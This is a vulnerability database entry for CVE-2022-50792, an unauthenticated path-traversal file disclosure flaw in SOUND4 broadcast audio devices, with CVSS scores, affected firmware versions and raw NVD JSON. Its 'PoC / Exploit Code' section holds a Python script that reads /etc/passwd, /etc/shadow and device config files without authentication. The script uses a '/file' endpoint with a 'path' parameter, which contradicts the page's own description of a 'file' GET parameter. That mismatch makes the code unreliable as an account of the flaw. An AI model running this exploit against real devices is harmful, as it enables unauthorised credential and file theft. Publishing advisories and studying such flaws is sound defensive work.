Security Vulnerability Report
中文
CVE-2022-50792 CVSS 7.5 HIGH

CVE-2022-50792

Published: 2025-12-30 23:15:46
Last Modified: 2026-01-16 19:16:12
Source: [email protected]

Description

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive system files. Attackers can exploit the vulnerability by manipulating the 'file' GET parameter to disclose arbitrary files on the affected device.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT <= 2.x
SOUND4 FIRST <= 2.x
SOUND4 PULSE <= 2.x
SOUND4 Eco <= 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2022-50792 PoC - Unauthenticated File Disclosure # Target: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x def exploit_cve_2022_50792(target_url, file_path): """ Exploit for SOUND4 devices file disclosure vulnerability Args: target_url: Base URL of the SOUND4 device (e.g., http://192.168.1.100) file_path: Path to file to read (e.g., ../../../../etc/passwd) Returns: File contents if successful, None otherwise """ # Construct the malicious request endpoint = f"{target_url}/file" params = { 'path': file_path } try: # Send GET request without authentication response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Successfully retrieved: {file_path}") print(f"[+] Content Length: {len(response.text)} bytes") return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": # Example usage target = "http://target-device.local" # Read system files files_to_read = [ "../../../../etc/passwd", "../../../../etc/shadow", "../../../../etc/hosts", "../../../../etc/config/system" ] for file_path in files_to_read: print(f"\n[*] Attempting to read: {file_path}") content = exploit_cve_2022_50792(target, file_path) if content: print(content[:500]) # Print first 500 chars

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50792", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:46.077", "lastModified": "2026-01-16T19:16:11.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive system files. Attackers can exploit the vulnerability by manipulating the 'file' GET parameter to disclose arbitrary files on the affected device."}, {"lang": "es", "value": "Las versiones 2.x e inferiores de SOUND4 IMPACT/FIRST/PULSE/Eco contienen una vulnerabilidad de divulgación de archivos no autenticada que permite a atacantes remotos acceder a archivos sensibles del sistema. Los atacantes pueden explotar la vulnerabilidad manipulando el parámetro GET 'file' para divulgar archivos arbitrarios en el dispositivo afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.